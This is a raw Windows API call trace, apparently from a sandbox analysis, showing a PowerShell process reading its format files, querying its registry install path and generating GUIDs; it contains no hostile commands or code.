	[0664.372] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.372] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.373] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.374] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.374] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.374] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.374] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.374] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.375] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.375] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.375] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.377] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.377] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.378] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.378] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.378] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.379] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.379] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.379] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.380] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.380] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.380] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.380] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.381] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.381] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.381] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.382] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.784] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.784] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.785] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.785] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.785] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.786] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.786] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.786] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.787] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.787] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.787] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.788] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.788] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.788] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.788] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.789] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.789] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.790] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.791] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.793] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.793] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.794] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.794] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.794] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.794] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.795] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.795] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.795] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.796] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.799] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0665.799] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0xf37, lpOverlapped=0x0) returned 1
	[0665.799] ReadFile (in: hFile=0x31c, lpBuffer=0x3224df7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3224df7*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0665.799] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0665.800] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x31c) returned 0x0
	[0665.800] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0665.800] CoTaskMemAlloc (cb=0x5a) returned 0x1b3114a0
	[0665.800] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b3114a0, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0665.800] CoTaskMemFree (pv=0x1b3114a0) 
	[0665.800] RegCloseKey (hKey=0x31c) returned 0x0
	[0665.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0665.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0667.622] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xce62d864, Data2=0xa991, Data3=0x4f20, Data4=([0]=0x90, [1]=0xc0, [2]=0xd, [3]=0xd7, [4]=0xa9, [5]=0xf4, [6]=0x47, [7]=0x74))) returned 0x0
	[0667.622] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x2ec94f5f, Data2=0x2117, Data3=0x47fb, Data4=([0]=0xba, [1]=0x5, [2]=0x46, [3]=0x54, [4]=0xc6, [5]=0x68, [6]=0x5b, [7]=0x6f))) returned 0x0
	[0667.634] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb9c2d05a, Data2=0xd76a, Data3=0x4bc1, Data4=([0]=0x82, [1]=0x4b, [2]=0x8b, [3]=0x37, [4]=0x51, [5]=0x1, [6]=0xf4, [7]=0x97))) returned 0x0
	[0667.638] VirtualQuery (in: lpAddress=0x10b720, lpBuffer=0x10c5e0, dwLength=0x30 | out: lpBuffer=0x10c5e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0667.639] VirtualQuery (in: lpAddress=0x10b7b0, lpBuffer=0x10c670, dwLength=0x30 | out: lpBuffer=0x10c670*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0667.640] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x9da5305, Data2=0x6cdf, Data3=0x4fc1, Data4=([0]=0x9c, [1]=0x82, [2]=0x41, [3]=0xf9, [4]=0xb4, [5]=0x6a, [6]=0xf1, [7]=0x95))) returned 0x0
	[0667.644] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x7e796e1d, Data2=0xa2c8, Data3=0x4700, Data4=([0]=0x8c, [1]=0x28, [2]=0x82, [3]=0xb0, [4]=0xbd, [5]=0x55, [6]=0x44, [7]=0xa2))) returned 0x0
	[0667.645] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xebc2c459, Data2=0xc57f, Data3=0x4236, Data4=([0]=0xa7, [1]=0x39, [2]=0x5c, [3]=0x69, [4]=0x35, [5]=0xfb, [6]=0x12, [7]=0xee))) returned 0x0
	[0669.589] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x46a2e21c, Data2=0x3703, Data3=0x462a, Data4=([0]=0xb6, [1]=0x9e, [2]=0xcf, [3]=0xc0, [4]=0xe2, [5]=0xe4, [6]=0x3, [7]=0x85))) returned 0x0
	[0669.589] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xdca75095, Data2=0xcc01, Data3=0x4cf1, Data4=([0]=0x98, [1]=0x4a, [2]=0x8c, [3]=0xee, [4]=0xa0, [5]=0x64, [6]=0x5, [7]=0x88))) returned 0x0
	[0669.590] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xd80f0a6, Data2=0xffe5, Data3=0x4699, Data4=([0]=0xb9, [1]=0x99, [2]=0x38, [3]=0xb7, [4]=0x80, [5]=0xbd, [6]=0x2c, [7]=0x57))) returned 0x0
	[0669.590] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x530ee2c5, Data2=0x3771, Data3=0x4e58, Data4=([0]=0xa1, [1]=0xc8, [2]=0x7e, [3]=0x80, [4]=0x21, [5]=0xa5, [6]=0x92, [7]=0x75))) returned 0x0
	[0669.590] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x1576417a, Data2=0xfae8, Data3=0x41fb, Data4=([0]=0xab, [1]=0x88, [2]=0xfd, [3]=0x7a, [4]=0xa8, [5]=0x73, [6]=0x9d, [7]=0x1a))) returned 0x0
	[0669.590] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x2c90678f, Data2=0x79e8, Data3=0x4eb8, Data4=([0]=0x84, [1]=0xdc, [2]=0x2b, [3]=0x7c, [4]=0xf2, [5]=0xd4, [6]=0xf8, [7]=0xa1))) returned 0x0
	[0669.591] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb61153c8, Data2=0xd91d, Data3=0x47ea, Data4=([0]=0xa9, [1]=0x25, [2]=0xbc, [3]=0x99, [4]=0x3e, [5]=0x91, [6]=0x6, [7]=0x4d))) returned 0x0
	[0669.591] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xf6b07928, Data2=0x2a05, Data3=0x4648, Data4=([0]=0x90, [1]=0x59, [2]=0x50, [3]=0x1a, [4]=0xe8, [5]=0x22, [6]=0x2a, [7]=0xd))) returned 0x0
	[0669.591] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x37cc5a07, Data2=0x3ffe, Data3=0x47c0, Data4=([0]=0xa2, [1]=0x56, [2]=0x4f, [3]=0xb2, [4]=0x87, [5]=0x38, [6]=0xb8, [7]=0xa7))) returned 0x0
	[0669.596] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x363a6a98, Data2=0x6105, Data3=0x4a44, Data4=([0]=0xa3, [1]=0x9, [2]=0x84, [3]=0x51, [4]=0x3c, [5]=0x54, [6]=0x88, [7]=0x67))) returned 0x0
	[0669.603] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x4a548d28, Data2=0x171, Data3=0x4c7e, Data4=([0]=0x85, [1]=0xe, [2]=0x8a, [3]=0xdc, [4]=0xae, [5]=0xbc, [6]=0xd6, [7]=0x95))) returned 0x0
	[0669.611] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x4e7927ce, Data2=0xc637, Data3=0x46ff, Data4=([0]=0x9a, [1]=0xa4, [2]=0x50, [3]=0x1f, [4]=0x5b, [5]=0xf7, [6]=0x2, [7]=0xd2))) returned 0x0
	[0669.611] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xddfb785d, Data2=0x389e, Data3=0x47a3, Data4=([0]=0x89, [1]=0x71, [2]=0x1a, [3]=0x1f, [4]=0x86, [5]=0xd0, [6]=0xda, [7]=0xbe))) returned 0x0
	[0669.612] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb5b94953, Data2=0xe012, Data3=0x4a31, Data4=([0]=0xa7, [1]=0x96, [2]=0x26, [3]=0x13, [4]=0xa7, [5]=0x82, [6]=0x5d, [7]=0xc4))) returned 0x0
	[0671.286] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x953b764c, Data2=0x42ff, Data3=0x4f5e, Data4=([0]=0xaf, [1]=0x8, [2]=0xee, [3]=0xb6, [4]=0xd5, [5]=0x3e, [6]=0x18, [7]=0xad))) returned 0x0
	[0671.286] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x555310df, Data2=0x391e, Data3=0x438c, Data4=([0]=0x9d, [1]=0xf5, [2]=0xf, [3]=0x25, [4]=0xb4, [5]=0x2b, [6]=0x38, [7]=0x6a))) returned 0x0
	[0671.286] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x686f0d05, Data2=0x3ff5, Data3=0x4060, Data4=([0]=0x92, [1]=0x4b, [2]=0xcf, [3]=0x3e, [4]=0x9a, [5]=0xf, [6]=0xfc, [7]=0x7))) returned 0x0
	[0671.289] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xcc6f8cdf, Data2=0xc276, Data3=0x4fe1, Data4=([0]=0x99, [1]=0x3e, [2]=0x48, [3]=0xdc, [4]=0xa2, [5]=0x60, [6]=0x56, [7]=0xa6))) returned 0x0
	[0671.289] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x5758df53, Data2=0x389c, Data3=0x48bb, Data4=([0]=0x81, [1]=0x56, [2]=0xc1, [3]=0x63, [4]=0x41, [5]=0x87, [6]=0xee, [7]=0x17))) returned 0x0
	[0671.289] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0671.290] GetFileType (hFile=0x31c) returned 0x1
	[0671.290] SetErrorMode (uMode=0x1) returned 0x1
	[0671.290] GetFileType (hFile=0x31c) returned 0x1
	[0671.290] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.290] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.290] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.291] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.291] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0671.291] ReadFile (in: hFile=0x31c, lpBuffer=0x31d6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31d6cc8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
